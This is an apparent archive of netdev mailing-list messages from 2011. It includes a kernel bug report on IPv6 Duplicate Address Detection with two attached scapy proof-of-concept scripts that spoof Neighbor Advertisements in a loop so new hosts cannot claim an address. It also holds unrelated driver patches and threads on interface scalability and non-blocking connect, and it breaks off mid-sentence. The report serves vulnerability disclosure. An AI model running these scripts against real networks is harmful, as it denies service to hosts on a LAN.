> IPv6 Layer: fe80::200:edff:feXX:XXXX --> ff02::1
> ICMPv6
> Type 136 (Neighbor Advertisement)
> Target: fe80::200:edff:feXX:XXXX
> ICMPv6 Option
> Type 2 (Target link-layer address) Victim MAC
>
> Please find attached a drawing and a proof of concept.
>
> [3.] Keywords (i.e., modules, networking, kernel):
>
> Network, IPv6, Duplicate Address Detection
>
> [4.] Kernel version (from /proc/version):
>
> Latest tested:
> Linux version 2.6.35-22-generic (buildd@rothera) (gcc version 4.4.5
> (Ubuntu/Linaro 4.4.4-14ubuntu4) ) #33-Ubuntu SMP Sun Sep 19 20:34:50 UTC
> 2010
> (and before most probably)
>
> [6.] A small shell script or example program which triggers the
> problem (if possible)
>
> Please find attached a python script demonstrating the problem.
>
> [X.] Other notes, patches, fixes, workarounds:
>
> The Linux Kernel should not accept incoming Ethernet packets originating
> from an internal Ethernet card (identified by the MAC address)
>


[-- Attachment #2: dad-dos_special.py --]
[-- Type: text/x-python, Size: 974 bytes --]

#! /usr/bin/env python

import sys
from multiprocessing import Process
from scapy.all import *

def f(pkt):
        sendp(pkt, loop=1, inter=1)

def callback(pkt):
        
        if IPv6 in pkt and ICMPv6ND_NS in pkt:

                src_mac=pkt.sprintf("%Ether.src%")   # Source MAC address
                src=pkt.sprintf("%IPv6.src%")   # Source address
                dst=pkt.sprintf("%IPv6.dst%")   # Destination address
                tgt=pkt.sprintf("%ICMPv6ND_NS.tgt%")    # Target address

                if src=="::" and "ff02::1:ff" in dst:

                        eth = Ether(src=src_mac,dst=src_mac)
                        ip = IPv6(src=tgt,dst="ff02::1")
                        icmp = ICMPv6ND_NA(tgt=tgt)
                        icmpOpt = ICMPv6NDOptDstLLAddr(lladdr=src_mac)

                        packet = eth/ip/icmp/icmpOpt

                        p = Process(target=f, args=(packet,))
                        p.start()

def main():
        conf.iface6="eth1"
        try:
                scapy.sendrecv.sniff(prn=callback,store=0)
        except KeyboardInterrupt:
                exit(0)

if __name__ == "__main__":
        main()

^ permalink raw reply

* Re: Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Gervais Arthur @ 2011-05-07 13:17 UTC (permalink / raw)
  To: Eric Dumazet; +Cc: Jan Ceuleers, netdev
In-Reply-To: <1304773802.2821.1214.camel@edumazet-laptop>

On 05/07/2011 03:10 PM, Eric Dumazet wrote:
> Le samedi 07 mai 2011 à 14:55 +0200, Jan Ceuleers a écrit :
>> The networking folks are on netdev
>>
>> -------- Original Message --------
>> Subject: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform
>> ICMPv6 packets
>> Date: Thu, 05 May 2011 11:52:05 +0200
>> From: Gervais Arthur<arthur.gervais@insa-lyon.fr>
>> To:<linux-kernel@vger.kernel.org>
>> CC:<arthur.gervais@insa-lyon.fr>
>>
>> [1.] One line summary of the problem:
>>
>> A specially crafted Ethernet ICMPv6 packet which is not conform to the
>> RFC can perform a IPv6 Duplicate Address Detection Failure.
>>
>> [2.] Full description of the problem/report:
>>
>> If a new IPv6 node joins the local area network, the new node sends an
>> ICMPv6 Neighbor Solicitation packet in order to check if the
>> self-generated local-link IPv6 address already occupied is.
>>
>> An attacker can answer to this Neighbor Solicitation packet with an
>> ICMPv6 Neighbor Advertisement packet, so that the new IPv6 node is not
>> able to associate the just generated IPv6 address.
>> -- This problem is well known and IPv6 related.
>>
>> The new problem is that the attacker can modify the Ethernet Neighbor
>> Advertisement packets, so that they are not RFC conform and so that it
>> is even more difficult to detect the attacker.
>>
>> If an attacker sends the following packet, duplicate address detection
>> fails on Linux:
>>
>> Ethernet Layer: 	Victim MAC -->  Victim MAC
>> IPv6 Layer:		fe80::200:edff:feXX:XXXX -->  ff02::1
>> 			ICMPv6
>> 			  Type 136 (Neighbor Advertisement)
>> 			  Target: fe80::200:edff:feXX:XXXX
>> 			ICMPv6 Option
>> 			  Type 2 (Target link-layer address) Victim MAC
>>
>> Please find attached a drawing and a proof of concept.
>>
>> [3.] Keywords (i.e., modules, networking, kernel):
>>
>> Network, IPv6, Duplicate Address Detection
>>
>> [4.] Kernel version (from /proc/version):
>>
>> Latest tested:
>> Linux version 2.6.35-22-generic (buildd@rothera) (gcc version 4.4.5
>> (Ubuntu/Linaro 4.4.4-14ubuntu4) ) #33-Ubuntu SMP Sun Sep 19 20:34:50 UTC
>> 2010
>> (and before most probably)
>>
>> [6.] A small shell script or example program which triggers the
>>         problem (if possible)
>>
>> Please find attached a python script demonstrating the problem.
>>
>> [X.] Other notes, patches, fixes, workarounds:
>>
>> The Linux Kernel should not accept incoming Ethernet packets originating
>> from an internal Ethernet card (identified by the MAC address)
>>
>
> I fail to understand the problem.
>
> The attacker might use any kind of source MAC address to fool 'Victim'
> or 'network admins'
>
> Why one particular address should be avoided ?
>
>
>

Currently the IPv6 implementation says (from the victim's view):
I send a Neighbor Solicitation for a given IPv6 address to perform
duplicate address detection.

If I then receive a Neighbor Advertisement packet from my MAC address,
to my MAC address, with my MAC address in the ICMPv6 target option, then
the requested IPv6 address must already be in use and I cannot take it.

I think such a packet should never be allowed to be accepted, because 
the victim just asked if the address is free.

If such a packet is accepted, it is even more difficult to find the 
attacker.
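
The check I have in mind could be sketched roughly like this. It
illustrates the proposal only and is not what the kernel currently does;
the function name and parameters are hypothetical.

```python
def claims_to_come_from_us(own_macs, eth_src, target_lladdr=None):
    """Return True if a received Neighbor Advertisement names one of our MACs.

    own_macs      -- MAC addresses configured on this host (assumed input)
    eth_src       -- source MAC address of the Ethernet frame
    target_lladdr -- value of the ICMPv6 target link-layer address
                     option, or None if the option is absent
    """
    own = {mac.lower() for mac in own_macs}
    if eth_src.lower() in own:
        return True
    return target_lladdr is not None and target_lladdr.lower() in own
```

A host applying this rule would ignore such an advertisement during
duplicate address detection instead of treating its address as taken.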


^ permalink raw reply

* Re: Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Eric Dumazet @ 2011-05-07 13:10 UTC (permalink / raw)
  To: Jan Ceuleers; +Cc: netdev, Gervais Arthur
In-Reply-To: <4DC54157.9010306@computer.org>

Le samedi 07 mai 2011 à 14:55 +0200, Jan Ceuleers a écrit :
> The networking folks are on netdev
> 
> -------- Original Message --------
> Subject: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform 
> ICMPv6 packets
> Date: Thu, 05 May 2011 11:52:05 +0200
> From: Gervais Arthur <arthur.gervais@insa-lyon.fr>
> To: <linux-kernel@vger.kernel.org>
> CC: <arthur.gervais@insa-lyon.fr>
> 
> [1.] One line summary of the problem:
> 
> A specially crafted Ethernet ICMPv6 packet which is not conform to the
> RFC can perform a IPv6 Duplicate Address Detection Failure.
> 
> [2.] Full description of the problem/report:
> 
> If a new IPv6 node joins the local area network, the new node sends an
> ICMPv6 Neighbor Solicitation packet in order to check if the
> self-generated local-link IPv6 address already occupied is.
> 
> An attacker can answer to this Neighbor Solicitation packet with an
> ICMPv6 Neighbor Advertisement packet, so that the new IPv6 node is not
> able to associate the just generated IPv6 address.
> -- This problem is well known and IPv6 related.
> 
> The new problem is that the attacker can modify the Ethernet Neighbor
> Advertisement packets, so that they are not RFC conform and so that it
> is even more difficult to detect the attacker.
> 
> If an attacker sends the following packet, duplicate address detection
> fails on Linux:
> 
> Ethernet Layer: 	Victim MAC --> Victim MAC
> IPv6 Layer:		fe80::200:edff:feXX:XXXX --> ff02::1
> 			ICMPv6
> 			  Type 136 (Neighbor Advertisement)
> 			  Target: fe80::200:edff:feXX:XXXX
> 			ICMPv6 Option
> 			  Type 2 (Target link-layer address) Victim MAC
> 
> Please find attached a drawing and a proof of concept.
> 
> [3.] Keywords (i.e., modules, networking, kernel):
> 
> Network, IPv6, Duplicate Address Detection
> 
> [4.] Kernel version (from /proc/version):
> 
> Latest tested:
> Linux version 2.6.35-22-generic (buildd@rothera) (gcc version 4.4.5
> (Ubuntu/Linaro 4.4.4-14ubuntu4) ) #33-Ubuntu SMP Sun Sep 19 20:34:50 UTC
> 2010
> (and before most probably)
> 
> [6.] A small shell script or example program which triggers the
>        problem (if possible)
> 
> Please find attached a python script demonstrating the problem.
> 
> [X.] Other notes, patches, fixes, workarounds:
> 
> The Linux Kernel should not accept incoming Ethernet packets originating
> from an internal Ethernet card (identified by the MAC address)
> 

I fail to understand the problem.

The attacker might use any kind of source MAC address to fool the 'Victim'
or 'network admins'.

Why should one particular address be avoided?




^ permalink raw reply

* Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Jan Ceuleers @ 2011-05-07 12:55 UTC (permalink / raw)
  To: netdev; +Cc: Gervais Arthur

[-- Attachment #1: Type: text/plain, Size: 2221 bytes --]

The networking folks are on netdev

-------- Original Message --------
Subject: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform 
ICMPv6 packets
Date: Thu, 05 May 2011 11:52:05 +0200
From: Gervais Arthur <arthur.gervais@insa-lyon.fr>
To: <linux-kernel@vger.kernel.org>
CC: <arthur.gervais@insa-lyon.fr>

[1.] One line summary of the problem:

A specially crafted Ethernet ICMPv6 packet which does not conform to the
RFC can cause an IPv6 Duplicate Address Detection failure.

[2.] Full description of the problem/report:

If a new IPv6 node joins the local area network, the new node sends an
ICMPv6 Neighbor Solicitation packet in order to check whether the
self-generated link-local IPv6 address is already occupied.

An attacker can answer this Neighbor Solicitation packet with an
ICMPv6 Neighbor Advertisement packet, so that the new IPv6 node is not
able to assign the just-generated IPv6 address.
-- This problem is well known and IPv6 related.

The new problem is that the attacker can modify the Ethernet Neighbor
Advertisement packets so that they do not conform to the RFC, which
makes it even more difficult to detect the attacker.

If an attacker sends the following packet, duplicate address detection
fails on Linux:

Ethernet Layer: 	Victim MAC --> Victim MAC
IPv6 Layer:		fe80::200:edff:feXX:XXXX --> ff02::1
			ICMPv6
			  Type 136 (Neighbor Advertisement)
			  Target: fe80::200:edff:feXX:XXXX
			ICMPv6 Option
			  Type 2 (Target link-layer address) Victim MAC

Please find attached a drawing and a proof of concept.

[3.] Keywords (i.e., modules, networking, kernel):

Network, IPv6, Duplicate Address Detection

[4.] Kernel version (from /proc/version):

Latest tested:
Linux version 2.6.35-22-generic (buildd@rothera) (gcc version 4.4.5
(Ubuntu/Linaro 4.4.4-14ubuntu4) ) #33-Ubuntu SMP Sun Sep 19 20:34:50 UTC
2010
(and before most probably)

[6.] A small shell script or example program which triggers the
       problem (if possible)

Please find attached a python script demonstrating the problem.

[X.] Other notes, patches, fixes, workarounds:

The Linux Kernel should not accept incoming Ethernet packets originating
from an internal Ethernet card (identified by the MAC address)


[-- Attachment #2: DAD_DoS_Linux_tech.png --]
[-- Type: image/png, Size: 17435 bytes --]

[-- Attachment #3: dad-dos.py --]
[-- Type: text/x-python, Size: 998 bytes --]

#! /usr/bin/env python

import sys
from multiprocessing import Process
from scapy.all import *

def f(pkt):
        sendp(pkt, loop=1, inter=1)

def callback(pkt):
        if IPv6 in pkt and ICMPv6ND_NS in pkt:
                src_mac = pkt.sprintf("%Ether.src%")    # source MAC address
                src = pkt.sprintf("%IPv6.src%")         # source IPv6 address
                dst = pkt.sprintf("%IPv6.dst%")         # destination IPv6 address
                tgt = pkt.sprintf("%ICMPv6ND_NS.tgt%")  # target address

                if src == "::" and "ff02::1:ff" in dst:
                        eth = Ether(src="00:20:ed:74:89:82", dst=src_mac)
                        ip = IPv6(src=tgt, dst="ff02::1")
                        icmp = ICMPv6ND_NA(tgt=tgt)
                        icmpOpt = ICMPv6NDOptDstLLAddr(lladdr="00:20:ed:74:89:82")

                        packet = eth/ip/icmp/icmpOpt

                        p = Process(target=f, args=(packet,))
                        p.start()

def main():
        conf.iface6="eth1"
        try:
                scapy.sendrecv.sniff(prn=callback,store=0)
        except KeyboardInterrupt:
                exit(0)

if __name__ == "__main__":
        main()

^ permalink raw reply

* [PATCH] [RESEND] iwl4965: drop a lone pr_err()
From: Paul Bolle @ 2011-05-07 12:31 UTC (permalink / raw)
  To: John W. Linville; +Cc: linux-wireless, netdev, linux-kernel

iwl4965_rate_control_register() prints a message at KERN_ERR level. It
looks like it's just a debugging message, so pr_err() seems to be
overdone. But none of the similar functions in drivers/net/wireless
print a message, so let's just drop it entirely.

Signed-off-by: Paul Bolle <pebolle@tiscali.nl>
---
Previously sent for (I guess) v2.6.39-rc2. Still present in v2.6.39-rc6.

 drivers/net/wireless/iwlegacy/iwl-4965-rs.c |    1 -
 1 files changed, 0 insertions(+), 1 deletions(-)

diff --git a/drivers/net/wireless/iwlegacy/iwl-4965-rs.c b/drivers/net/wireless/iwlegacy/iwl-4965-rs.c
index 31ac672..8950939 100644
--- a/drivers/net/wireless/iwlegacy/iwl-4965-rs.c
+++ b/drivers/net/wireless/iwlegacy/iwl-4965-rs.c
@@ -2860,7 +2860,6 @@ static struct rate_control_ops rs_4965_ops = {
 
 int iwl4965_rate_control_register(void)
 {
-	pr_err("Registering 4965 rate control operations\n");
 	return ieee80211_rate_control_register(&rs_4965_ops);
 }
 
-- 
1.7.4.4




^ permalink raw reply related

* [PATCH 1/5] ssb: Change fallback sprom to callback mechanism.
From: Hauke Mehrtens @ 2011-05-07 12:27 UTC (permalink / raw)
  To: ralf; +Cc: linux-mips, Hauke Mehrtens, Michael Buesch, netdev,
	Florian Fainelli
In-Reply-To: <1304771263-10937-1-git-send-email-hauke@hauke-m.de>

Some embedded devices like the Netgear WNDR3300 have two SSB based
cards without their own SPROM on the PCI bus. We have to provide two
different fallback SPROMs for these and this was not possible with the
old solution. In the bcm47xx architecture the sprom data is stored in
the nvram in the main flash storage. The architecture code will be able
to fill the sprom with the stored data based on the bus where the
device was found.

The bcm63xx code should do the same thing as before, just using the new
API.

CC: Michael Buesch <mb@bu3sch.de>
CC: netdev@vger.kernel.org
CC: Florian Fainelli <florian@openwrt.org>
Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
---
 arch/mips/bcm63xx/boards/board_bcm963xx.c |   16 ++++++++++++++--
 drivers/ssb/pci.c                         |   16 +++++++++++-----
 drivers/ssb/sprom.c                       |   26 +++++++++++++++-----------
 drivers/ssb/ssb_private.h                 |    2 +-
 include/linux/ssb/ssb.h                   |    4 +++-
 5 files changed, 44 insertions(+), 20 deletions(-)

diff --git a/arch/mips/bcm63xx/boards/board_bcm963xx.c b/arch/mips/bcm63xx/boards/board_bcm963xx.c
index 8dba8cf..40b223b 100644
--- a/arch/mips/bcm63xx/boards/board_bcm963xx.c
+++ b/arch/mips/bcm63xx/boards/board_bcm963xx.c
@@ -643,6 +643,17 @@ static struct ssb_sprom bcm63xx_sprom = {
 	.boardflags_lo		= 0x2848,
 	.boardflags_hi		= 0x0000,
 };
+
+int bcm63xx_get_fallback_sprom(struct ssb_bus *bus, struct ssb_sprom *out)
+{
+	if (bus->bustype == SSB_BUSTYPE_PCI) {
+		memcpy(out, &bcm63xx_sprom, sizeof(struct ssb_sprom));
+		return 0;
+	} else {
+		printk(KERN_ERR PFX "unable to fill SPROM for given bustype.\n");
+		return -EINVAL;
+	}
+}
 #endif
 
 /*
@@ -793,8 +804,9 @@ void __init board_prom_init(void)
 	if (!board_get_mac_address(bcm63xx_sprom.il0mac)) {
 		memcpy(bcm63xx_sprom.et0mac, bcm63xx_sprom.il0mac, ETH_ALEN);
 		memcpy(bcm63xx_sprom.et1mac, bcm63xx_sprom.il0mac, ETH_ALEN);
-		if (ssb_arch_set_fallback_sprom(&bcm63xx_sprom) < 0)
-			printk(KERN_ERR "failed to register fallback SPROM\n");
+		if (ssb_arch_register_fallback_sprom(
+				&bcm63xx_get_fallback_sprom) < 0)
+			printk(KERN_ERR PFX "failed to register fallback SPROM\n");
 	}
 #endif
 }
diff --git a/drivers/ssb/pci.c b/drivers/ssb/pci.c
index 6f34963..34955d1 100644
--- a/drivers/ssb/pci.c
+++ b/drivers/ssb/pci.c
@@ -662,7 +662,6 @@ static int sprom_extract(struct ssb_bus *bus, struct ssb_sprom *out,
 static int ssb_pci_sprom_get(struct ssb_bus *bus,
 			     struct ssb_sprom *sprom)
 {
-	const struct ssb_sprom *fallback;
 	int err;
 	u16 *buf;
 
@@ -707,10 +706,17 @@ static int ssb_pci_sprom_get(struct ssb_bus *bus,
 		if (err) {
 			/* All CRC attempts failed.
 			 * Maybe there is no SPROM on the device?
-			 * If we have a fallback, use that. */
-			fallback = ssb_get_fallback_sprom();
-			if (fallback) {
-				memcpy(sprom, fallback, sizeof(*sprom));
+			 * Now we ask the arch code if there is some sprom
+			 * avaliable for this device in some other storage */
+			err = ssb_fill_sprom_with_fallback(bus, sprom);
+			if (err) {
+				ssb_printk(KERN_WARNING PFX "WARNING: Using"
+					   " fallback SPROM failed (err %d)\n",
+					   err);
+			} else {
+				ssb_dprintk(KERN_DEBUG PFX "Using SPROM"
+					    " revision %d provided by"
+					    " platform.\n", sprom->revision);
 				err = 0;
 				goto out_free;
 			}
diff --git a/drivers/ssb/sprom.c b/drivers/ssb/sprom.c
index 5f34d7a..20cd139 100644
--- a/drivers/ssb/sprom.c
+++ b/drivers/ssb/sprom.c
@@ -17,7 +17,7 @@
 #include <linux/slab.h>
 
 
-static const struct ssb_sprom *fallback_sprom;
+static int(*get_fallback_sprom)(struct ssb_bus *dev, struct ssb_sprom *out);
 
 
 static int sprom2hex(const u16 *sprom, char *buf, size_t buf_len,
@@ -145,13 +145,14 @@ out:
 }
 
 /**
- * ssb_arch_set_fallback_sprom - Set a fallback SPROM for use if no SPROM is found.
+ * ssb_arch_register_fallback_sprom - Registers a method providing a fallback
+ * SPROM if no SPROM is found.
  *
- * @sprom: The SPROM data structure to register.
+ * @sprom_callback: The callback function.
  *
- * With this function the architecture implementation may register a fallback
- * SPROM data structure. The fallback is only used for PCI based SSB devices,
- * where no valid SPROM can be found in the shadow registers.
+ * With this function the architecture implementation may register a callback
+ * handler which fills the SPROM data structure. The fallback is only used for
+ * PCI based SSB devices, where no valid SPROM can be found in the shadow registers.
  *
  * This function is useful for weird architectures that have a half-assed SSB device
  * hardwired to their PCI bus.
@@ -163,18 +164,21 @@ out:
  *
  * This function is available for architecture code, only. So it is not exported.
  */
-int ssb_arch_set_fallback_sprom(const struct ssb_sprom *sprom)
+int ssb_arch_register_fallback_sprom(int (*sprom_callback)(struct ssb_bus *bus, struct ssb_sprom *out))
 {
-	if (fallback_sprom)
+	if (get_fallback_sprom)
 		return -EEXIST;
-	fallback_sprom = sprom;
+	get_fallback_sprom = sprom_callback;
 
 	return 0;
 }
 
-const struct ssb_sprom *ssb_get_fallback_sprom(void)
+int ssb_fill_sprom_with_fallback(struct ssb_bus *bus, struct ssb_sprom *out)
 {
-	return fallback_sprom;
+	if (!get_fallback_sprom)
+		return -ENOENT;
+
+	return get_fallback_sprom(bus, out);
 }
 
 /* http://bcm-v4.sipsolutions.net/802.11/IsSpromAvailable */
diff --git a/drivers/ssb/ssb_private.h b/drivers/ssb/ssb_private.h
index 0331139..1a32f58 100644
--- a/drivers/ssb/ssb_private.h
+++ b/drivers/ssb/ssb_private.h
@@ -171,7 +171,7 @@ ssize_t ssb_attr_sprom_store(struct ssb_bus *bus,
 			     const char *buf, size_t count,
 			     int (*sprom_check_crc)(const u16 *sprom, size_t size),
 			     int (*sprom_write)(struct ssb_bus *bus, const u16 *sprom));
-extern const struct ssb_sprom *ssb_get_fallback_sprom(void);
+extern int ssb_fill_sprom_with_fallback(struct ssb_bus *bus, struct ssb_sprom *out);
 
 
 /* core.c */
diff --git a/include/linux/ssb/ssb.h b/include/linux/ssb/ssb.h
index 9659eff..045f72a 100644
--- a/include/linux/ssb/ssb.h
+++ b/include/linux/ssb/ssb.h
@@ -404,7 +404,9 @@ extern bool ssb_is_sprom_available(struct ssb_bus *bus);
 
 /* Set a fallback SPROM.
  * See kdoc at the function definition for complete documentation. */
-extern int ssb_arch_set_fallback_sprom(const struct ssb_sprom *sprom);
+extern int ssb_arch_register_fallback_sprom(
+		int (*sprom_callback)(struct ssb_bus *bus,
+		struct ssb_sprom *out));
 
 /* Suspend a SSB bus.
  * Call this from the parent bus suspend routine. */
-- 
1.7.4.1
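
For readers who want to see the shape of the new API without the kernel
context, here is a rough user-space model in Python. It is only a sketch:
the function names mirror the C ones from the patch, but the bus
dictionaries, the "pci"/"ssb" strings, the slot field and the SPROM contents
are assumptions made up for illustration, not kernel data structures.

```python
import errno

# Models the static function pointer in drivers/ssb/sprom.c.
_get_fallback_sprom = None


def register_fallback_sprom(callback):
    """Model of ssb_arch_register_fallback_sprom(): one callback at most."""
    global _get_fallback_sprom
    if _get_fallback_sprom is not None:
        return -errno.EEXIST
    _get_fallback_sprom = callback
    return 0


def fill_sprom_with_fallback(bus, out):
    """Model of ssb_fill_sprom_with_fallback(): ask the arch code for data."""
    if _get_fallback_sprom is None:
        return -errno.ENOENT
    return _get_fallback_sprom(bus, out)


def example_arch_callback(bus, out):
    """Hypothetical arch callback: choose SPROM data based on the bus."""
    if bus.get("bustype") != "pci":
        return -errno.EINVAL
    # Illustrative values only; a real callback would read them from nvram.
    out.update({"revision": 2, "source": "nvram for slot %d" % bus["slot"]})
    return 0
```

Because the callback receives the bus, two cards on different buses can get
different data, which a single static fallback structure could not express.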

^ permalink raw reply related

* Re: Scalability of interface creation and deletion
From: Eric Dumazet @ 2011-05-07 12:22 UTC (permalink / raw)
  To: Alex Bligh; +Cc: netdev
In-Reply-To: <891B02256A0667292521A4BF@Ximines.local>

Le samedi 07 mai 2011 à 12:08 +0100, Alex Bligh a écrit :
> I am trying to track down why interface creation slows down badly with
> large numbers of interfaces (~1,000 interfaces) and why deletion is so
> slow. Use case: restarting routers needs to be fast; some failover methods
> require interface up/down; some routers need lots of interfaces.
> 
> I have written a small shell script to create and delete a number of
> interfaces supplied on the command line (script appended below). It
> is important to run this with udev, udev-bridge etc. disabled. In
> my environment (Ubuntu 2.6.32-28-generic, Lucid), I did this by:
>  * service upstart-udev-bridge stop
>  * service udev stop
>  * unshare -n bash
> If you don't do this, you are simply timing your distro's interface
> scripts.
> 
> Note the "-n" parameter creates the supplied number of veth pair
> interfaces. As these are pairs, there are twice as many interfaces actually
> created.
> 
> So, the results which are pretty repeatable are as follows:
> 
>                             100 pairs      500 pairs
> Interface creation               14ms          110ms
> Interface deletion              160ms          148ms
> 
> Now I don't think interface deletion has in fact got faster: simply
> the overhead of loading the script is spread over more processes.
> But there are two obvious conclusions:
> 
> 1. Interface creation slows down hugely with more interfaces

sysfs is the problem, a very well known one
(see sysfs_refresh_inode()).

Try:

$ time ls /sys/class/net >/dev/null

real	0m0.002s
user	0m0.000s
sys	0m0.001s
$ modprobe dummy numdummies=1000
$ time ls /sys/class/net >/dev/null

real	0m0.041s
user	0m0.003s
sys	0m0.002s
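
The same measurement can be repeated from a script. A minimal Python sketch,
using only the standard library; time_listdir and its repeat count are
names chosen for this example, and os.listdir() only reads the directory,
so the numbers will not match `time ls` exactly.

```python
import os
import time


def time_listdir(path="/sys/class/net", repeats=5):
    """Return (entry_count, best_seconds) for listing `path`."""
    best = float("inf")
    count = 0
    for _ in range(repeats):
        start = time.perf_counter()
        count = len(os.listdir(path))
        # Keep the fastest run to reduce noise from a cold cache.
        best = min(best, time.perf_counter() - start)
    return count, best
```

Calling time_listdir() before and after loading the dummy module should show
the listing time growing with the number of interfaces.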


> 2. Interface deletion is normally much slower than interface creation
> 
> strace -T -ttt on the "ip" command used to do this does not show the delay
> where I thought it would be - cataloguing the existing interfaces. Instead,
> it's the final send() to the netlink socket which does the relevant action
> which appears to be slow, for both addition and deletion. Adding the last
> interface takes 200ms in that syscall, the first is quick (symptomatic of a
> slowdown); for deletion the last send syscall is quick.
> 
> Poking about in net/core/dev.c, I see that interface names are hashed using
> a hash with a maximum of 256 entries. However, these seem to be hash
> buckets supporting multiple entries so I can't imagine a chain of 4 entries
> is problematic.

It's not.

> 
> I am having difficulty seeing what might be the issue in interface
> creation. Any ideas?
> 

Actually a lot; just run

git log net/core/dev.c

and you'll see many commits to make this faster.

> In interface deletion, my attention is drawn to netdev_wait_allrefs,
> which does this:
>         refcnt = netdev_refcnt_read(dev);
> 

Here refcnt is 0, or there is a bug somewhere.
(It happens, we fix bugs once in a while)

>         while (refcnt != 0) {
>                 ...
>                 msleep(250);
> 
>                 refcnt = netdev_refcnt_read(dev);
> 		....
>         }
> 
> I am guessing that this is going to do the msleep 50% of the time,
> explaining 125ms of the observed time. How would people react to
> exponential backoff instead (untested):
> 
> 	int backoff = 10;
>         refcnt = netdev_refcnt_read(dev);
> 
>         while (refcnt != 0) {
>                 ...
>                 msleep(backoff);
>                 if ((backoff *= 2) > 250)
>                   backoff = 250;
> 		
>                 refcnt = netdev_refcnt_read(dev);
> 		....
>         }
> 
> 

Welcome to the club. This has been discussed on netdev for many
years. A lot of work has been done to make it better.

Interface deletion needs several RCU synchronization calls, and they are
very expensive. This is the price to pay for a lockless network stack in
the fast paths.
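
For reference, the sleep schedule that the quoted exponential backoff would
produce can be worked out with a short Python sketch. It models only the
arithmetic of the proposed loop (start at 10 ms, double each time, cap at
250 ms); backoff_schedule is a hypothetical name, and as noted above the
loop is not expected to run at all when refcnt is already 0.

```python
from itertools import islice


def backoff_schedule(start_ms=10, cap_ms=250):
    """Yield successive msleep() durations for the proposed loop."""
    backoff = start_ms
    while True:
        yield backoff
        # Double the delay, but never sleep longer than the cap.
        backoff = min(backoff * 2, cap_ms)


# First seven sleeps of the schedule, in milliseconds.
first = list(islice(backoff_schedule(), 7))
```

With these parameters the refcount is rechecked 10, 30 and 70 ms after the
first read, so a reference dropped early is noticed well before the fixed
250 ms sleep would have ended.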




^ permalink raw reply

* Re: bug in select(2) regarding non-blocking connect(2) completion?
From: Eric Dumazet @ 2011-05-07 12:12 UTC (permalink / raw)
  To: Michael Shuldman; +Cc: linux-kernel, David S. Miller, karls, netdev
In-Reply-To: <20110507105152.GA13459@jensen.inet.no>

Le samedi 07 mai 2011 à 12:51 +0200, Michael Shuldman a écrit :
> Hello, I am occasionally encountering what I believe is a bug in the
> kernel.
> 
> Below is a strace that I believe shows how the bug manifests itself,
> with my comments.
> 
> 
> # first select.  All fd's in the write set ([15 17 ... 51 55]) are 
> # non-blocking sockets that have had a connect(2) previously issued on
> # them, and which have yet to finish connecting as far as we know
> # at the time we call select(2).

We don't see the return value of connect(): maybe the error was already
returned there.

Only EINPROGRESS is valid here (otherwise the fd should be closed right away).

> 03:55:31.808548 select(58, [4 8 11 12 13 14 16 18 19 20 21 22 23 24 26 27 30 31 32 33 34 35 36 37 39 40 41 43 44 46 48 49 50 52 53 54 57], [15 17 25 29 45 47 51 55], [11 12 13 14 16 18 19 20 21 22 23 24 26 27 30 31 32 33 34 35 36 37 39 40 41 43 44 46 48 49 50 52 53 54 57], {1, 0}) = 3 (in [16 26], out [51], left {1, 0})
> 
> # As indicated by the results returned by the above select(2), fd 51 should
> # have finished the connect attempt, but when we try to find out whether 
> # the connect(2) succeeded or failed, the results are conflicting.
> 

If the connect() attempt is rejected by the remote peer, select() reports
your fd as 'writable', in the sense that you have the definitive answer to
your non-blocking connect().

> 03:55:31.808622 getpeername(51, 0x7fff5d2eaa8c, [0]) = -1 ENOTCONN (Transport endpoint is not connected)

This means the endpoint is not connected: the other peer sent RST or did
not answer the SYN packets.


> 03:55:31.808900 getsockopt(51, SOL_SOCKET, SO_ERROR, [0], [4]) = 0
> 

Hmm, interesting... Are you sure a previous call was not already made
(since it clears the error)?

> # getpeername(2) failing on a socket that has finished connecting should 
> # indicate that the connect(2) failed.  Yet when we try to fetch the
> # SO_ERROR of the socket, it says no error is currently set.
> # We then loop around with select(2) again, and again the same thing
> # happens:
> 
> 03:55:31.809259 select(58, [4 8 11 12 13 14 16 18 19 20 21 22 23 24 26 27 30 31 32 33 34 35 36 37 39 40 41 43 44 46 48 49 50 52 53 54 57], [15 17 25 29 45 47 51 55], [11 12 13 14 16 18 19 20 21 22 23 24 26 27 30 31 32 33 34 35 36 37 39 40 41 43 44 46 48 49 50 52 53 54 57], {1, 0}) = 3 (in [16 26], out [51], left {1, 0})
> 03:55:31.809329 getpeername(51, 0x7fff5d2eaa8c, [0]) = -1 ENOTCONN (Transport endpoint is not connected)
> 03:55:31.809640 getsockopt(51, SOL_SOCKET, SO_ERROR, [0], [4]) = 0
> 

Well, if you missed the original error report, all subsequent getpeername()
and SO_ERROR calls will return the same thing, and select() will say the fd
is ready for 'write'.

> ...
> 
> # finally, getsockopt(2) returns that the connect(2) failed.
> 03:55:32.521146 getpeername(51, 0x7fff5d2eaa8c, [0]) = -1 ENOTCONN (Transport endpoint is not connected)
> 03:55:32.521614 getsockopt(51, SOL_SOCKET, SO_ERROR, [101], [4]) = 0
> 
> In other words, select(2) says the socket has finished connecting,
> getpeername(2) neither confirms nor denies this (it can only confirm
> if the connect finished successfully).  getsockopt(2) and SO_ERROR
> however says there is no error on the socket, which coupled
> with getpeername(2) failing, indicates that the connect(2) has
> not yet finished
> 
> 
> 
> This does not happen all the time.  E.g., I watched the system for
> an hour yesterday, as things were starting up and the number of
> concurrent tcp clients gradually increased from zero to around 700,
> with no observable problems.  However after a while, the problem
> starts occurring, related to an increasing number of clients or
> something else, I do not know.
> 
> Currently the system has a little over 3,000 clients and the problem
> occurs now and then, sometimes several times a minute, while sometimes
> it can take dozens of minutes between each time.  At the moment,
> the last time the problem was detected was 40 minutes ago.
> 
> The software the above strace is related to is a proxy server, and
> if there are 3000 clients (incoming TCP sessions), there would
> normally be 3000 outgoing TCP sessions also.  
> 
> uname -a on the system in question reports 
> 2.6.18-238.9.1.el5 #1 SMP Tue Apr 12 18:10:13 EDT 2011 x86_64 x86_64
> x86_64 GNU/Linux
> 
> Thankful for any hints or pointers related to this problem.
> With kind regards,
> 

Make sure you don't miss an error in the connect() system call.
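
A minimal sketch of that check, in Python for brevity. It assumes a plain
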